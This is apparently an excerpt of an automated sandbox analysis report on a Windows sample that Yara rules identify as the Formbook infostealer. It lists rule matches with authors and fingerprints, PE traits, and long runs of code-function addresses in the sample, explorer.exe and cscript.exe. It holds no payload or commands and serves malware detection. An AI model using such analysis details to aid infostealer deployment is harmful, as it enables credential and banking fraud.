      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_0040523F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040523F

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: MaMsKRmgXZ.exe PID: 6720, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: MaMsKRmgXZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: MaMsKRmgXZ.exe PID: 6720, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403235
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_004066660_2_00406666
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_6EC01A980_2_6EC01A98
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F04452_2_341F0445
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3425D4802_2_3425D480
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342BA5262_2_342BA526
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AF5C92_2_342AF5C9
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A75C62_2_342A75C6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428D62C2_2_3428D62C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420C6002_2_3420C600
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342146702_2_34214670
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429D6462_2_3429D646
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F06802_2_341F0680
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342636EC2_2_342636EC
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AF6F62_2_342AF6F6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AA6C02_2_342AA6C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EC6E02_2_341EC6E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A67572_2_342A6757
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F27602_2_341F2760
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FA7602_2_341FA760
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429E0762_2_3429E076
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3422508C2_2_3422508C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E00A02_2_341E00A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FB0D02_2_341FB0D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A70F12_2_342A70F1
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF1132_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428D1302_2_3428D130
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B010E2_2_342B010E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3423717A2_2_3423717A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B1E02_2_3420B1E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F51C02_2_341F51C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A124C2_2_342A124C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DD2EC2_2_341DD2EC
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FE3102_2_341FE310
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AF3302_2_342AF330
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E13802_2_341E1380
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426EC202_2_3426EC20
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E0C122_2_341E0C12
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FAC202_2_341FAC20
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A6C692_2_342A6C69
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AEC602_2_342AEC60
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429EC4C2_2_3429EC4C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F3C602_2_341F3C60
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34289C982_2_34289C98
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420FCE02_2_3420FCE0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342BACEB2_2_342BACEB
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34277CE82_2_34277CE8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34208CDF2_2_34208CDF
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AFD272_2_342AFD27
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EAD002_2_341EAD00
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A7D4C2_2_342A7D4C
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0D692_2_341F0D69
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34202DB02_2_34202DB0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F9DD02_2_341F9DD0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3428FDF42_2_3428FDF4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34290E6D2_2_34290E6D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34232E482_2_34232E48
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34210E502_2_34210E50
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A0EAD2_2_342A0EAD
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F1EB22_2_341F1EB2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E2EE82_2_341E2EE8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FCF002_2_341FCF00
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AFF632_2_342AFF63
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426FF402_2_3426FF40
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AEFBF2_2_342AEFBF
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A1FC62_2_342A1FC6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F6FE02_2_341F6FE0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342908352_2_34290835
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F38002_2_341F3800
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421E8102_2_3421E810
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B8702_2_3420B870
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342658702_2_34265870
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AF8722_2_342AF872
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F98702_2_341F9870
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D68682_2_341D6868
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342698B22_2_342698B2
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342068822_2_34206882
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A78F32_2_342A78F3
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F28C02_2_341F28C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A18DA2_2_342A18DA
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AE9A62_2_342AE9A6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EE9A02_2_341EE9A0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342359C02_2_342359C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342ACA132_2_342ACA13
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AEA5B2_2_342AEA5B
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420FAA02_2_3420FAA0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AFA892_2_342AFA89
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342AFB2E2_2_342AFB2E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F0B102_2_341F0B10
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3422DB192_2_3422DB19
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34264BC02_2_34264BC0
      Source: C:\Windows\explorer.exeCode function: 4_2_0A72F2324_2_0A72F232
      Source: C:\Windows\explorer.exeCode function: 4_2_0A72E0364_2_0A72E036
      Source: C:\Windows\explorer.exeCode function: 4_2_0A7250824_2_0A725082
      Source: C:\Windows\explorer.exeCode function: 4_2_0A729B324_2_0A729B32
      Source: C:\Windows\explorer.exeCode function: 4_2_0A729B304_2_0A729B30
      Source: C:\Windows\explorer.exeCode function: 4_2_0A72C9124_2_0A72C912
      Source: C:\Windows\explorer.exeCode function: 4_2_0A726D024_2_0A726D02
      Source: C:\Windows\explorer.exeCode function: 4_2_0A7325CD4_2_0A7325CD
      Source: C:\Windows\explorer.exeCode function: 4_2_119025CD4_2_119025CD
      Source: C:\Windows\explorer.exeCode function: 4_2_118F6D024_2_118F6D02
      Source: C:\Windows\explorer.exeCode function: 4_2_118FC9124_2_118FC912
      Source: C:\Windows\explorer.exeCode function: 4_2_118F50824_2_118F5082
      Source: C:\Windows\explorer.exeCode function: 4_2_118FE0364_2_118FE036
      Source: C:\Windows\explorer.exeCode function: 4_2_118F9B324_2_118F9B32
      Source: C:\Windows\explorer.exeCode function: 4_2_118F9B304_2_118F9B30
      Source: C:\Windows\explorer.exeCode function: 4_2_118FF2324_2_118FF232
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046604455_2_04660445
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0472A5265_2_0472A526
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046846705_2_04684670
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0467C6005_2_0467C600
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0465C6E05_2_0465C6E0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471A6C05_2_0471A6C0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046606805_2_04660680
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046627605_2_04662760
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0466A7605_2_0466A760
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_047167575_2_04716757
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0470E0765_2_0470E076
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046500A05_2_046500A0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0472010E5_2_0472010E
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0466E3105_2_0466E310
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471EC605_2_0471EC60
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04716C695_2_04716C69
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0470EC4C5_2_0470EC4C
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0466AC205_2_0466AC20
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046DEC205_2_046DEC20
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04650C125_2_04650C12
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0472ACEB5_2_0472ACEB
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04678CDF5_2_04678CDF
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04660D695_2_04660D69
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0465AD005_2_0465AD00
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04672DB05_2_04672DB0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04700E6D5_2_04700E6D
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046A2E485_2_046A2E48
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04680E505_2_04680E50
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04652EE85_2_04652EE8
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04710EAD5_2_04710EAD
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0466CF005_2_0466CF00
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04666FE05_2_04666FE0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471EFBF5_2_0471EFBF
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046468685_2_04646868
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_047008355_2_04700835
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0468E8105_2_0468E810
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046628C05_2_046628C0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046768825_2_04676882
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0465E9A05_2_0465E9A0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471E9A65_2_0471E9A6
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471EA5B5_2_0471EA5B
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471CA135_2_0471CA13
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04660B105_2_04660B10
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046D4BC05_2_046D4BC0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046CD4805_2_046CD480
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046F54905_2_046F5490
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_047175C65_2_047175C6
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471F5C95_2_0471F5C9
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0470D6465_2_0470D646
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046FD62C5_2_046FD62C
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046D36EC5_2_046D36EC
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471F6F65_2_0471F6F6
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_047170F15_2_047170F1
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0466B0D05_2_0466B0D0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0469508C5_2_0469508C
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046A717A5_2_046A717A
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046FD1305_2_046FD130
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0464F1135_2_0464F113
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0467B1E05_2_0467B1E0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046651C05_2_046651C0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471124C5_2_0471124C
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0464D2EC5_2_0464D2EC
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471F3305_2_0471F330
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046513805_2_04651380
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04663C605_2_04663C60
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046E7CE85_2_046E7CE8
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0467FCE05_2_0467FCE0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046F9C985_2_046F9C98
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04717D4C5_2_04717D4C
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471FD275_2_0471FD27
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_046FFDF45_2_046FFDF4
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04669DD05_2_04669DD0
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_04661EB25_2_04661EB2
      Source: C:\Windows\SysWOW64\cscript.exeCode function: 5_2_0471FF635_2_0471FF63
